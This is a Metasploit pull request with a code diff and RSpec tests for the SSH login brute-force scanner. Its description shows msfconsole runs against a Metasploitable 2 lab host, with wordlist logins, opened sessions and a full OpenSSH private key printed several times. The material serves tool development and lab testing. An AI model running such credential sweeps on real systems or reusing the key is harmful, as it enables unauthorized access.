+    if datastore['USERNAME'].blank? && datastore['USER_FILE'].blank? && datastore['USERPASS_FILE'].blank? && !datastore['ANONYMOUS_LOGIN']
+      print_brute level: :error, ip: ip, msg: 'No credentials specified. Set USERNAME/PASSWORD, USER_FILE/PASS_FILE/USERPASS_FILE, or ANONYMOUS_LOGIN.'
+      return
     end
 
     unless attempt_password_login? || attempt_pubkey_login?
@@ -174,7 +168,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def do_login_creds(ip)
-    print_status("#{ip}:#{rport} SSH - Testing User/Pass combinations")
+    print_brute ip: ip, msg: 'SSH - Testing user/pass combinations'
 
     cred_collection = build_credential_collection(
       username: datastore['USERNAME'],
@@ -209,7 +203,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def do_login_pubkey(ip)
-    print_status("#{ip}:#{rport} SSH - Testing Cleartext Keys")
+    print_brute ip: ip, msg: 'SSH - Testing key combinations'
 
     keys = Metasploit::Framework::KeyCollection.new(
       key_path: datastore['KEY_PATH'],
@@ -220,9 +214,9 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     unless keys.valid?
-      print_error('Files that failed to be read:')
+      print_brute level: :error, ip: ip, msg: 'Failed to read key files:'
       keys.error_list.each do |err|
-        print_line("\t- #{err}")
+        print_brute level: :error, ip: ip, msg: "  - #{err}"
       end
     end
 
@@ -235,6 +229,7 @@ class MetasploitModule < Msf::Auxiliary
     key_sources.append('database') if prepend_db_creds?
 
     print_brute level: :vstatus, ip: ip, msg: "Testing #{key_count} #{'key'.pluralize(key_count)} from #{key_sources.join(' and ')}"
+
     scanner = Metasploit::Framework::LoginScanner::SSH.new(
       configure_login_scanner(
         host: ip,
@@ -258,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
         credential_data[:core] = credential_core
         create_credential_login(credential_data)
       rescue ::StandardError => e
-        print_brute level: :info, ip: ip, msg: "Failed to create credential: #{e.class} #{e}"
+        print_brute level: :info, ip: ip, msg: "Failed to create credential - #{e.class}: #{e}"
         print_brute level: :warn, ip: ip, msg: 'We do not currently support storing password protected SSH keys: https://github.com/rapid7/metasploit-framework/issues/20598'
       end
 
@@ -390,5 +385,4 @@ class MetasploitModule < Msf::Auxiliary
       datastore['USER_AS_PASS'] ||
       datastore['ANONYMOUS_LOGIN']
   end
-
 end

--- a/spec/modules/auxiliary/scanner/ssh/ssh_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/ssh/ssh_login_spec.rb
@@ -175,7 +175,7 @@ RSpec.describe 'SSH Login Check Scanner' do
         subject.session_setup(result, scanner)
       end.to change(Mdm::Host, :count).by(1)
 
-      expect(Mdm::Host.last.os_name).to eql platform
+      expect(Mdm::Host.last.os_name).to eql platform.capitalize
     end
 
     context 'when scanner does not have an ssh connection' do

--- a/spec/modules/auxiliary/scanner/ssh/ssh_login_spec.rb
+++ b/spec/modules/auxiliary/scanner/ssh/ssh_login_spec.rb
@@ -178,6 +178,21 @@ RSpec.describe 'SSH Login Check Scanner' do
       expect(Mdm::Host.last.os_name).to eql platform.capitalize
     end
 
+    context 'when session setup raises an error' do
+      before(:each) do
+        allow(subject).to receive(:start_session).and_raise(StandardError, 'test error')
+      end
+
+      it 'returns nil' do
+        expect(subject.session_setup(result, scanner)).to be_nil
+      end
+
+      it 'logs the error' do
+        expect(subject).to receive(:elog).with('Failed to setup the session', error: instance_of(StandardError))
+        subject.session_setup(result, scanner)
+      end
+    end
+
     context 'when scanner does not have an ssh connection' do
       before(:each) do
         allow(scanner).to receive(:ssh_socket).and_return(nil)


### PR DESCRIPTION
This PR does a few things:

- Handles using options/settings more (PASSWORD vs USER_AS_PASS)
- Use SSH mixin
- Able to store SSH key used as loot
- Cleaner output
- Added more metadata to the module

Target is Metasploitable 2.

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      1         1      2      0      0
After : *        default  1      2         1      2      1      3
```

## Setup

Simple wordlists for users:

```console
$ cat << EOF > /tmp/users.txt
msfadmin
kali
incorrect
EOF
$ 
```

A SSH key had been pre-setup/configured on the target, skipped in this guide.

## Before

- All testing was done using master branch
- Have to define a password, even if using USER_AS_PASS
- Scanning a valid host, but closed port: 0 host
- Scanning a valid host, open port, but incorrect service: 0 host
- Scanning a valid host, and valid service: 1 host, 1 service

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/ssh_login;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   KEY_PASS                           no        Passphrase for SSH private key(s)
   KEY_PATH                           no        Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   PRIVATE_KEY                        no        The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and
                                                ECDSA private keys are supported.
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         /tmp/users.txt   no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 RPORT=9999
[*] 10.0.0.10:9999        - Starting bruteforce
[-] Msf::OptionValidateError The following options failed to validate:
[-] Invalid option KEY_PATH: At least one of KEY_PATH, PRIVATE_KEY or PASSWORD must be given
[-] Invalid option PASSWORD: At least one of KEY_PATH, PRIVATE_KEY or PASSWORD must be given
[-] Invalid option PRIVATE_KEY: At least one of KEY_PATH, PRIVATE_KEY or PASSWORD must be given
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 RPORT=9999 USER_AS_PASS=true
[*] 10.0.0.10:9999        - Starting bruteforce
[-] Msf::OptionValidateError The following options failed to validate:
[-] Invalid option KEY_PATH: At least one of KEY_PATH, PRIVATE_KEY or PASSWORD must be given
[-] Invalid option PASSWORD: At least one of KEY_PATH, PRIVATE_KEY or PASSWORD must be given
[-] Invalid option PRIVATE_KEY: At least one of KEY_PATH, PRIVATE_KEY or PASSWORD must be given
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 RPORT=9999 USER_AS_PASS=true PASSWORD=wrong
[*] 10.0.0.10:9999        - Starting bruteforce
[*] 10.0.0.10:9999 SSH - Testing User/Pass combinations
[-] Could not connect: The connection was refused by the remote host (10.0.0.10:9999).
[-] Could not connect: The connection was refused by the remote host (10.0.0.10:9999).
[-] Could not connect: The connection was refused by the remote host (10.0.0.10:9999).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 RPORT=21 USER_AS_PASS=true PASSWORD=wrong
[*] 10.0.0.10:21          - Starting bruteforce
[*] 10.0.0.10:21 SSH - Testing User/Pass combinations
[-] 10.0.0.10:21          - Could not connect: execution expired
[-] 10.0.0.10:21          - Could not connect: execution expired
[-] 10.0.0.10:21          - Could not connect: execution expired
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 USER_AS_PASS=true PASSWORD=wrong
[*] 10.0.0.10:22          - Starting bruteforce
[*] 10.0.0.10:22 SSH - Testing User/Pass combinations
[-] 10.0.0.10:22          - Failed: 'msfadmin:wrong'
[+] 10.0.0.10:22          - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (10.0.0.1:35683 -> 10.0.0.10:22) at 2026-05-26 21:56:39 +0100
[-] 10.0.0.10:22          - Failed: 'kali:wrong'
[-] 10.0.0.10:22          - Failed: 'kali:kali'
[-] 10.0.0.10:22          - Failed: 'incorrect:wrong'
[-] 10.0.0.10:22          - Failed: 'incorrect:incorrect'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      1      0      0

msf auxiliary(scanner/ssh/ssh_login) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             linux

msf auxiliary(scanner/ssh/ssh_login) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf auxiliary(scanner/ssh/ssh_login) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                     References
---------                ----       -------       --------  ----                     ----------
2026-05-26 20:56:38 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH Login Check Scanner  CVE-1999-0502,ATT&CK-T1021.004

msf auxiliary(scanner/ssh/ssh_login) > creds
Credentials
===========

id   host       origin     service       public    private   realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------   -----  ------------  ----------  ----------------
574  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin         Password

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 KEY_PATH=/tmp/metasploitable2_key
[*] 10.0.0.10:22          - Starting bruteforce
[*] 10.0.0.10:22 SSH - Testing Cleartext Keys
[*] 10.0.0.10:22          - Testing 1 key from /tmp/metasploitable2_key
[+] 10.0.0.10:22          - Success: 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] 10.0.0.10:22          - msfadmin:-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAt9NdDr5EFdaTyo1QGLno6XxegrdH/+P9YM/Hp09Ld1HcPEADfSRr
wBL3XUFZZokfMWSvUoylEvNv61e1/DID7MVUUuCYD5PSnvpI9cOJB0T3j1JkiJi8I0VSeE
Kpfa/P9nUvepLjxpPM5ps4nDH8BWgorpYXTeYljaEXgVYBQRIbv2vkeElz4CvRZ9RBcvCV
N8X65/6nFu71zbJBaeRtHsh1bMDxfST2G7IRVhIsgtlwklDzsMm0XsnUiH0z48NN/isJIg
EqXFn+0MCfYSSO5joYdwgdSfkV7cJNgBjErwR4nGMi0s3plha8AfiuPZYb1qA0Vce4by4s
lU7hd8Q6iwAAA8jVmRkM1ZkZDAAAAAdzc2gtcnNhAAABAQC3010OvkQV1pPKjVAYuejpfF
6Ct0f/4/1gz8enT0t3Udw8QAN9JGvAEvddQVlmiR8xZK9SjKUS82/rV7X8MgPsxVRS4JgP
k9Ke+kj1w4kHRPePUmSImLwjRVJ4Qql9r8/2dS96kuPGk8zmmzicMfwFaCiulhdN5iWNoR
eBVgFBEhu/a+R4SXPgK9Fn1EFy8JU3xfrn/qcW7vXNskFp5G0eyHVswPF9JPYbshFWEiyC
2XCSUPOwybReydSIfTPjw03+KwkiASpcWf7QwJ9hJI7mOhh3CB1J+RXtwk2AGMSvBHicYy
LSzemWFrwB+K49lhvWoDRVx7hvLiyVTuF3xDqLAAAAAwEAAQAAAQAENc4S0V7D1UdLQ1NL
Ta688kFD4yi9/p3GAtxCw7kpwXE23Ax4aEYjfwu1UhLXG1rgibrOPDRnq7WrgTXE0exvFt
HomAZDjRIs2/Sh1FmmFflJigyNaFoewK6z3Gr/WvB7Z5Gvz/9xg98UhQeV5DsucIVGAmAE
Q7omdUMRjkO3FsYYlDT+0Tgvs1yxVQKFTlOIElpnoVvh503G9i5QL8cELZd83rUNYV1+OY
HPVQFrFB4dGSS6lp/T42/3AH/vhgsbuYbPPGd4PHVBMkzYaQmenC97gHbB+Z5PLRhbFscp
FYiHoKdgmc4769rtp5oTZVVUQUbyyNSZ+3wE+rqlrp9BAAAAgB9/SWii1nCtP6X8z0UqG+
euEoUNh69ESUi51YJ4Gqhx6SKbe0IQs9IVQR8dglMKbF60Ipx+IbpuABDG9iIgQgJbBA8U
DpPZAU80gkqjXMvUl1xQA+adu0UDckllwehUptytrhT3L3sJMg7UeJC3rJ+V5NeQolh0ir
HlF6+DBgfZAAAAgQDwcLzB2H6PTRik4AGcg5t/PKrBsg4pmIodhUOTYOThC2Bkp4r2tTfA
1csWU7hc/Plr028kGqeZuee8knanDqUg+eEa7/zz/CHB5fazFNpk8TVPEVJLnZ860wu3Nx
80eg902/Jdn2NdRE280RdrlKG4Vs+JBPyN8y3QlcJWitJToQAAAIEAw7i3ZPcUOuNP0t8y
WX8idZfdO0KZwwjZ5g1tnBB8ssyF+CHJsRZPTDJ1jpCfnABpR+gcrl/WTr7uvVKOfdHhhZ
LDReZsz8OqFWhkRC6iKgRm1sD3GLgOFPTzuY7g9gzt6tLUM6z9QHhQnLHl6UpmBhtBimNr
7ntN9e2vDt0JnqsAAAANa2FsaUBiZGVza3RvcAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
[*] SSH session 2 opened (10.0.0.1:40921 -> 10.0.0.10:22) at 2026-05-26 22:07:34 +0100
[-] 10.0.0.10:22          - Failed: 'kali:-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAt9NdDr5EFdaTyo1QGLno6XxegrdH/+P9YM/Hp09Ld1HcPEADfSRr
wBL3XUFZZokfMWSvUoylEvNv61e1/DID7MVUUuCYD5PSnvpI9cOJB0T3j1JkiJi8I0VSeE
Kpfa/P9nUvepLjxpPM5ps4nDH8BWgorpYXTeYljaEXgVYBQRIbv2vkeElz4CvRZ9RBcvCV
N8X65/6nFu71zbJBaeRtHsh1bMDxfST2G7IRVhIsgtlwklDzsMm0XsnUiH0z48NN/isJIg
EqXFn+0MCfYSSO5joYdwgdSfkV7cJNgBjErwR4nGMi0s3plha8AfiuPZYb1qA0Vce4by4s
lU7hd8Q6iwAAA8jVmRkM1ZkZDAAAAAdzc2gtcnNhAAABAQC3010OvkQV1pPKjVAYuejpfF
6Ct0f/4/1gz8enT0t3Udw8QAN9JGvAEvddQVlmiR8xZK9SjKUS82/rV7X8MgPsxVRS4JgP
k9Ke+kj1w4kHRPePUmSImLwjRVJ4Qql9r8/2dS96kuPGk8zmmzicMfwFaCiulhdN5iWNoR
eBVgFBEhu/a+R4SXPgK9Fn1EFy8JU3xfrn/qcW7vXNskFp5G0eyHVswPF9JPYbshFWEiyC
2XCSUPOwybReydSIfTPjw03+KwkiASpcWf7QwJ9hJI7mOhh3CB1J+RXtwk2AGMSvBHicYy
LSzemWFrwB+K49lhvWoDRVx7hvLiyVTuF3xDqLAAAAAwEAAQAAAQAENc4S0V7D1UdLQ1NL
Ta688kFD4yi9/p3GAtxCw7kpwXE23Ax4aEYjfwu1UhLXG1rgibrOPDRnq7WrgTXE0exvFt
HomAZDjRIs2/Sh1FmmFflJigyNaFoewK6z3Gr/WvB7Z5Gvz/9xg98UhQeV5DsucIVGAmAE
Q7omdUMRjkO3FsYYlDT+0Tgvs1yxVQKFTlOIElpnoVvh503G9i5QL8cELZd83rUNYV1+OY
HPVQFrFB4dGSS6lp/T42/3AH/vhgsbuYbPPGd4PHVBMkzYaQmenC97gHbB+Z5PLRhbFscp
FYiHoKdgmc4769rtp5oTZVVUQUbyyNSZ+3wE+rqlrp9BAAAAgB9/SWii1nCtP6X8z0UqG+
euEoUNh69ESUi51YJ4Gqhx6SKbe0IQs9IVQR8dglMKbF60Ipx+IbpuABDG9iIgQgJbBA8U
DpPZAU80gkqjXMvUl1xQA+adu0UDckllwehUptytrhT3L3sJMg7UeJC3rJ+V5NeQolh0ir
HlF6+DBgfZAAAAgQDwcLzB2H6PTRik4AGcg5t/PKrBsg4pmIodhUOTYOThC2Bkp4r2tTfA
1csWU7hc/Plr028kGqeZuee8knanDqUg+eEa7/zz/CHB5fazFNpk8TVPEVJLnZ860wu3Nx
80eg902/Jdn2NdRE280RdrlKG4Vs+JBPyN8y3QlcJWitJToQAAAIEAw7i3ZPcUOuNP0t8y
WX8idZfdO0KZwwjZ5g1tnBB8ssyF+CHJsRZPTDJ1jpCfnABpR+gcrl/WTr7uvVKOfdHhhZ
LDReZsz8OqFWhkRC6iKgRm1sD3GLgOFPTzuY7g9gzt6tLUM6z9QHhQnLHl6UpmBhtBimNr
7ntN9e2vDt0JnqsAAAANa2FsaUBiZGVza3RvcAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
'
[-] 10.0.0.10:22          - Failed: 'incorrect:-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAt9NdDr5EFdaTyo1QGLno6XxegrdH/+P9YM/Hp09Ld1HcPEADfSRr
wBL3XUFZZokfMWSvUoylEvNv61e1/DID7MVUUuCYD5PSnvpI9cOJB0T3j1JkiJi8I0VSeE
Kpfa/P9nUvepLjxpPM5ps4nDH8BWgorpYXTeYljaEXgVYBQRIbv2vkeElz4CvRZ9RBcvCV
N8X65/6nFu71zbJBaeRtHsh1bMDxfST2G7IRVhIsgtlwklDzsMm0XsnUiH0z48NN/isJIg
EqXFn+0MCfYSSO5joYdwgdSfkV7cJNgBjErwR4nGMi0s3plha8AfiuPZYb1qA0Vce4by4s
lU7hd8Q6iwAAA8jVmRkM1ZkZDAAAAAdzc2gtcnNhAAABAQC3010OvkQV1pPKjVAYuejpfF
6Ct0f/4/1gz8enT0t3Udw8QAN9JGvAEvddQVlmiR8xZK9SjKUS82/rV7X8MgPsxVRS4JgP
k9Ke+kj1w4kHRPePUmSImLwjRVJ4Qql9r8/2dS96kuPGk8zmmzicMfwFaCiulhdN5iWNoR
eBVgFBEhu/a+R4SXPgK9Fn1EFy8JU3xfrn/qcW7vXNskFp5G0eyHVswPF9JPYbshFWEiyC
2XCSUPOwybReydSIfTPjw03+KwkiASpcWf7QwJ9hJI7mOhh3CB1J+RXtwk2AGMSvBHicYy
LSzemWFrwB+K49lhvWoDRVx7hvLiyVTuF3xDqLAAAAAwEAAQAAAQAENc4S0V7D1UdLQ1NL
Ta688kFD4yi9/p3GAtxCw7kpwXE23Ax4aEYjfwu1UhLXG1rgibrOPDRnq7WrgTXE0exvFt
HomAZDjRIs2/Sh1FmmFflJigyNaFoewK6z3Gr/WvB7Z5Gvz/9xg98UhQeV5DsucIVGAmAE
Q7omdUMRjkO3FsYYlDT+0Tgvs1yxVQKFTlOIElpnoVvh503G9i5QL8cELZd83rUNYV1+OY
HPVQFrFB4dGSS6lp/T42/3AH/vhgsbuYbPPGd4PHVBMkzYaQmenC97gHbB+Z5PLRhbFscp
FYiHoKdgmc4769rtp5oTZVVUQUbyyNSZ+3wE+rqlrp9BAAAAgB9/SWii1nCtP6X8z0UqG+
euEoUNh69ESUi51YJ4Gqhx6SKbe0IQs9IVQR8dglMKbF60Ipx+IbpuABDG9iIgQgJbBA8U
DpPZAU80gkqjXMvUl1xQA+adu0UDckllwehUptytrhT3L3sJMg7UeJC3rJ+V5NeQolh0ir
HlF6+DBgfZAAAAgQDwcLzB2H6PTRik4AGcg5t/PKrBsg4pmIodhUOTYOThC2Bkp4r2tTfA
1csWU7hc/Plr028kGqeZuee8knanDqUg+eEa7/zz/CHB5fazFNpk8TVPEVJLnZ860wu3Nx
80eg902/Jdn2NdRE280RdrlKG4Vs+JBPyN8y3QlcJWitJToQAAAIEAw7i3ZPcUOuNP0t8y
WX8idZfdO0KZwwjZ5g1tnBB8ssyF+CHJsRZPTDJ1jpCfnABpR+gcrl/WTr7uvVKOfdHhhZ
LDReZsz8OqFWhkRC6iKgRm1sD3GLgOFPTzuY7g9gzt6tLUM6z9QHhQnLHl6UpmBhtBimNr
7ntN9e2vDt0JnqsAAAANa2FsaUBiZGVza3RvcAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      2      0      0

msf auxiliary(scanner/ssh/ssh_login) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             linux

msf auxiliary(scanner/ssh/ssh_login) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf auxiliary(scanner/ssh/ssh_login) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                     References
---------                ----       -------       --------  ----                     ----------
2026-05-26 21:07:21 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH Login Check Scanner  CVE-1999-0502,ATT&CK-T1021.004

msf auxiliary(scanner/ssh/ssh_login) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
577  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin                                                Password
578  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  73:46:4c:e3:da:4f:0f:17:40:60:04:4c:5c:06:fb:ed         SSH key

msf auxiliary(scanner/ssh/ssh_login) >
```



## After

- All testing was done on this branch, with SSH mixin (https://github.com/rapid7/metasploit-framework/pull/21479) and auth_brute_mixin applied (https://github.com/rapid7/metasploit-framework/pull/21396)
- Don't need to define a password when using USER_AS_PASS
- Scanning a valid host, but closed port: 1 host
- Scanning a valid host, open port, but incorrect: 1 host, 1 service
- Scanning a valid host, and valid SSH service: 1 host, 2 services

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/ssh_login;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   KEY_PASS                           no        Passphrase for SSH private key(s)
   KEY_PATH                           no        Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   PRIVATE_KEY                        no        The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and
                                                ECDSA private keys are supported.
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE         /tmp/users.txt   no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 RPORT=9999 USER_AS_PASS=true
[*] Starting SSH login sweep
[*] SSH - Testing user/pass combinations
[-] Could not connect: The connection was refused by the remote host (10.0.0.10:9999).
[-] Could not connect: The connection was refused by the remote host (10.0.0.10:9999).
[-] Could not connect: The connection was refused by the remote host (10.0.0.10:9999).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_login) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 RPORT=21 USER_AS_PASS=true
[*] Starting SSH login sweep
[*] SSH - Testing user/pass combinations
[-] Could not connect: execution expired
[-] Could not connect: execution expired
[-] Could not connect: execution expired
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf auxiliary(scanner/ssh/ssh_login) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf auxiliary(scanner/ssh/ssh_login) > services
Services
========

host       port  proto  name  state  info                resource  parents
----       ----  -----  ----  -----  ----                --------  -------
10.0.0.10  21    tcp          open   220 (vsFTPd 2.3.4)  {}

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10  USER_AS_PASS=true
[*] Starting SSH login sweep
[*] SSH - Testing user/pass combinations
[+] Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)'
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] SSH session 1 opened (10.0.0.1:42493 -> 10.0.0.10:22) at 2026-05-26 22:00:48 +0100
[-] Failed: 'kali:kali' (Incorrect: Authentication failed for user kali@10.0.0.10)
[-] Failed: 'incorrect:incorrect' (Incorrect: Authentication failed for user incorrect@10.0.0.10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      2

msf auxiliary(scanner/ssh/ssh_login) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
